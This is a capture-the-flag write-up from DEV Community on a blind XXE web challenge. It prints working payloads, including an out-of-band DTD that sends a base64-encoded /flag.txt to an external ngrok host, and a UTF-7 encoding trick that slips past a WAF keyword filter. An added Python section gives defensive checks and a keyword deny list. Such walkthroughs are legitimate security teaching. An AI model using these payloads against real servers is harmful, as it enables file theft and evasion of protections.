DEV Community

yudi

Web Exploitation - Final ARACTF 2021 Write Up

Under Development

This website, as its name says, is not yet fit to be put online ( ͡◉ ͜ʖ ͡◉)

Hint: Do you know about encoding formats? How many? If you do, let's wrap up this challenge

Technical Report

When I open the website, the page is immediately redirected to login.php, which is a fake form, so I use Burp Suite to look at the actual content of index.php.
There is an interesting JavaScript function called sendmessage that posts XML to /send.php. The payload should look like this:

<?xml version="1.0"?>
<root>
    <name>yudi</name>
    <email>test@test.com</email>
    <message>hello world!</message>
</root>

I also found another interesting link, to mybest.php. On that page I found another hint pointing to /flag.txt.

So I guess the XML endpoint we saw earlier can be used to retrieve the file /flag.txt. Let's try it using Insomnia with this payload:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///flag.txt'>]>
<root>&test;</root>

result: (screenshot omitted)

But there are two more issues:

  1. I get no output in the response (the XXE is blind)
  2. The WAF rejects !DOCTYPE, !ENTITY, !ELEMENT, file:// and .php

Then I try the out-of-band (OOB) method, making the parser load a remote DTD so that the result is sent back to my server.
The payload:

<!DOCTYPE root [
<!ELEMENT root ANY >
<!ENTITY % flag SYSTEM "http://075a05cf94ed.ngrok.io/dtd.xml">
%flag;
%all;
]>
<root>&send;</root>

dtd.xml

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://075a05cf94ed.ngrok.io/%file;'>">

Then I encode the whole payload as UTF-7, so the WAF's keyword filter no longer matches any of the blocked strings.
The final payload:

<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-DOCTYPE root +AFs
+ADwAIQ-ELEMENT root ANY +AD4
+ADwAIQ-ENTITY +ACU flag SYSTEM +ACI-http://075a05cf94ed.ngrok.io/dtd.xml+ACIAPg
+ACU-flag+ADs
+ACU-all+ADs
+AF0APg
+ADw-root+AD4AJg-send+ADsAPA-/root+AD4

dtd.xml

<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-ENTITY +ACU file SYSTEM +ACI-php://filter/convert.base64-encode/resource=/flag.txt+ACIAPg
+ADwAIQ-ENTITY +ACU all +ACIAPAAh-ENTITY send SYSTEM 'http://075a05cf94ed.ngrok.io/+ACU-file+ADs'+AD4AIgA+
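As an added example (not part of the write-up or the challenge), the Python below shows the defender's side of the two issues above: a keyword filter that inspects the raw bytes misses a DTD once its angle brackets are spelled as UTF-7 shift sequences, a filter that first decodes with the declared encoding still sees <!DOCTYPE, and the application itself should allowlist the encoding and refuse any DOCTYPE before parsing. The two documents and all function names are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the benign message the page's sendmessage() posts to /send.php.
BENIGN = (b'<?xml version="1.0"?>\n'
          b'<root><name>yudi</name><email>test@test.com</email>'
          b'<message>hello world!</message></root>')

# Constructed sample: a DOCTYPE with one harmless internal entity, spelled in UTF-7
# shift sequences the same way the write-up's final payload spells its DTD.
UTF7_DOCTYPE = (b'<?xml version="1.0" encoding="utf-7"?>\n'
                b'+ADwAIQ-DOCTYPE root +AFs\n'
                b'+ADwAIQ-ENTITY x +ACI-y+ACIAPg\n'
                b'+AF0APg\n'
                b'+ADw-root+AD4AJg-x+ADsAPA-/root+AD4-')

# The tokens the write-up says the WAF rejects, plus php:// from the second-stage DTD.
DTD_TOKENS = re.compile(r'<!(?:DOCTYPE|ENTITY|ELEMENT)|file://|php://|\.php', re.IGNORECASE)
XML_DECL_ENC = re.compile(rb'^<\?xml[^>]*?encoding=["\']([A-Za-z0-9._-]+)["\']')

def declared_encoding(raw: bytes) -> str:
    """Encoding named in the XML declaration; XML defaults to UTF-8 when it is absent."""
    m = XML_DECL_ENC.match(raw)
    return m.group(1).decode('ascii').lower() if m else 'utf-8'

def naive_waf_blocks(raw: bytes) -> bool:
    """Keyword match over the raw bytes: the kind of check the write-up bypassed."""
    return DTD_TOKENS.search(raw.decode('latin-1')) is not None

def normalized_waf_blocks(raw: bytes) -> bool:
    """Same keyword match, but over the text the XML parser will actually see."""
    try:
        text = raw.decode(declared_encoding(raw))
    except (LookupError, UnicodeDecodeError):
        return True  # unknown or malformed encoding: nothing a contact form needs
    return DTD_TOKENS.search(text) is not None

def safe_parse(raw: bytes, allowed=('utf-8', 'us-ascii')) -> dict:
    """Application-side fix: allowlist the encoding, refuse any DTD at all, then parse."""
    enc = declared_encoding(raw)
    if enc not in allowed:
        raise ValueError(f'unexpected XML encoding {enc!r}')
    if re.search(r'<!DOCTYPE', raw.decode(enc), re.IGNORECASE):
        raise ValueError('DOCTYPE is not accepted')
    root = ET.fromstring(raw)
    return {child.tag: (child.text or '') for child in root}
```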

result: (screenshots omitted)

FLAG: ara2021{ezzz_pz_lemon_sqzzzz}
